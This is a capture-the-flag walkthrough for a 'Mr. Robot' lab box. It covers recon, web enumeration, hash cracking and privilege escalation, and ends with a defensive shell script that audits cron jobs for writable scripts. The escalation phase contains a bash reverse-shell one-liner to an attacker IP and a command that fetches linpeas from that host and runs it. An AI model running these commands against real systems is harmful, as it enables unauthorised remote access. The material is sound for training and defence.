MR.ROBOT — CTF: Detailed Walkthrough

Challenge: "mr.robot-ctf-01" • Read: ~20 minutes

Table of Contents


  1. Recon
  2. Enumeration
  3. Exploit
  4. PrivEsc
  5. Flag
  6. Post Notes

Phase 1 — Recon (Surface & Passive)

Passive collection first — domain history, subdomains, certificates, and public footprints. Record every header, token hint, or developer comment.

terminal@recon:~#
# passive: cert + subdomain
# (crt.sh is a web service at https://crt.sh; the first line assumes a local wrapper script of that name)
crt.sh --domain example.com
subfinder -d example.com -silent > subdomains.txt
Run only in lab or where you have permission. Replace example.com.

Look at certificate common names, expiration history, and any anomalies (developer emails, alternate names).

terminal@recon:~#
# active: skip host discovery (-Pn), all TCP ports (-p-), default scripts + version detection
nmap -Pn -sC -sV -p- --min-rate 1000 -oA scans/initial 10.10.10.42
Record open ports and services. Note headers like X-ctf or odd cookies.

Phase 2 — Enumeration (Web & App)

Web enumeration — directory fuzzing, JS analysis, API auditing, and collection of endpoints. Look for hidden uploaders, backup files, or dev endpoints.

terminal@enum:~#
# dir brute
gobuster dir -u http://10.10.10.42 -w /usr/share/wordlists/dirb/common.txt -t 50 -o scans/gobuster.txt
Results: /admin, /uploads, /backup.zip (if present: note size & header)

Download and inspect JS files. Search for tokens, API endpoints, or base64 blobs. Static analysis often reveals logic flaws.

terminal@enum:~#
# fetch js & search
wget http://10.10.10.42/static/app.js -O app.js
grep -n "api" app.js || strings app.js | less
If you find /api/notes or /api/backup — test parameter handling carefully in lab.

Phase 3 — Exploit (Lab-Only Steps)

Use controlled POSTs and parameter fuzzing. If you discover a token mechanism, replay tokens safely in your isolated VM. The aim is initial shell or credential leak.

terminal@exploit:~#
# safe probe: post JSON (lab)
curl -s -X POST http://10.10.10.42/api/notes -H "Content-Type: application/json" \
  -d '{"title":"test","body":"probe","token":""}' | jq .
If response prints a backup link or hash — note it. Avoid brute-force on real services.

If you recover a hash: use offline cracking in your lab (john / hashcat) with known wordlists. Respect legal boundaries.

terminal@exploit:~#
# offline crack (lab)
john --wordlist=/usr/share/wordlists/rockyou.txt recovered_hash.txt
Result may yield credentials like fsociety123 (example).

Phase 4 — Privilege Escalation (Local Enumeration)

On the host, enumerate SUID binaries, cron jobs, sensitive files, and common misconfigurations. Tools: linpeas, sudo -l, find with SUID filters.

user@victim:~$
# local enum (lab)
wget http://10.10.14.1/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh
linPEAS highlights weak perms, writable scripts, or cron jobs running as root.

Example finding: /opt/backup.sh executed by root cron but world-writable. That’s an escalation vector in many CTFs.

user@victim:~$
# example: leverage writable backup script (lab)
echo "/bin/bash -i >& /dev/tcp/10.10.14.1/4444 0>&1" > /tmp/myscript.sh
# then wait for cron or trigger per lab instructions
Use only in CTF labs. This demonstrates the pattern of replacing writable scripts.
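The same finding from the defender's side, as an added example that is not part of the original walkthrough: a POSIX sh audit that parses an /etc/crontab-style file (assumed layout with a user field) and reports any referenced script that is group- or world-writable, the /opt/backup.sh pattern above. The crontab, scripts and temp directory it checks are constructed inline.

```shell
#!/bin/sh
# Added audit helper (not from the original walkthrough): flag /etc/crontab-style
# entries whose script is group- or world-writable, i.e. the root-cron
# /opt/backup.sh pattern from Phase 4, checked from the defender's side.

# audit_cron_scripts CRONFILE
# Prints "<user> <script> <mode>" per risky entry; exits 1 if any were found.
audit_cron_scripts() (
    set -f                         # cron's "*" fields must not glob-expand
    cronfile=$1; rc=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|\#*|[A-Za-z_]*=*) continue ;; esac   # blank, comment, VAR=
        set -- $line
        case "$1" in
            @*) [ $# -ge 3 ] || continue; user=$2; shift 2 ;;   # @daily user cmd
            *)  [ $# -ge 7 ] || continue; user=$6; shift 6 ;;   # m h dom mon dow user cmd
        esac
        # look past an interpreter prefix such as "sh /opt/backup.sh"
        case "$1" in sh|bash|/bin/sh|/bin/bash) if [ $# -ge 2 ]; then shift; fi ;; esac
        script=$1
        [ -f "$script" ] || continue
        mode=$(ls -ld "$script" | cut -c1-10)
        # char 6 = group write bit, char 9 = other write bit
        case "$mode" in
            ?????w*|????????w*) printf '%s %s %s\n' "$user" "$script" "$mode"; rc=1 ;;
        esac
    done < "$cronfile"
    exit $rc
)

# Constructed demo: a world-writable backup script and a correctly
# permissioned one under a temp dir, referenced from a constructed crontab.
# Returns 1 when the audit flags something (it should: backup.sh), else 0.
demo_cron_audit() {
    d=$(mktemp -d) || return 2
    printf '#!/bin/sh\ntar czf /tmp/srv.tgz /srv\n' > "$d/backup.sh"; chmod 0666 "$d/backup.sh"
    printf '#!/bin/sh\nlogrotate /etc/logrotate.conf\n' > "$d/rotate.sh"; chmod 0755 "$d/rotate.sh"
    printf 'MAILTO=root\n0 2 * * * root %s/backup.sh\n*/10 * * * * root sh %s/rotate.sh\n' \
        "$d" "$d" > "$d/crontab"
    if audit_cron_scripts "$d/crontab"; then r=0; else r=1; fi
    rm -rf "$d"
    return $r
}

if demo_cron_audit; then echo "no writable cron scripts"; else echo "writable cron script(s) listed above"; fi
```

Run it against a real /etc/crontab (or the files under /etc/cron.d) to get the same report for a host you administer.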

Phase 5 — Flag (Reveal)

Final step: retrieve root flag (e.g., /root/root.txt) after successful privilege escalation.

Warning: This page contains the canonical lab flag. For competitions, do not reveal flags publicly.

Post Exploit Notes & Lessons

  • Document everything: headers, cookies, tokens, file sizes, and timestamps.
  • Always test exploits in isolated lab VMs only.
  • Privilege escalation commonly arises from writable scripts, misconfigured sudo, exposed credentials, or outdated services.
  • When writing a public writeup, avoid posting spoilers or exact exploit scripts used in live environments.


© MR.ROBOT CTF — Educational Walkthrough • Lab-only instructions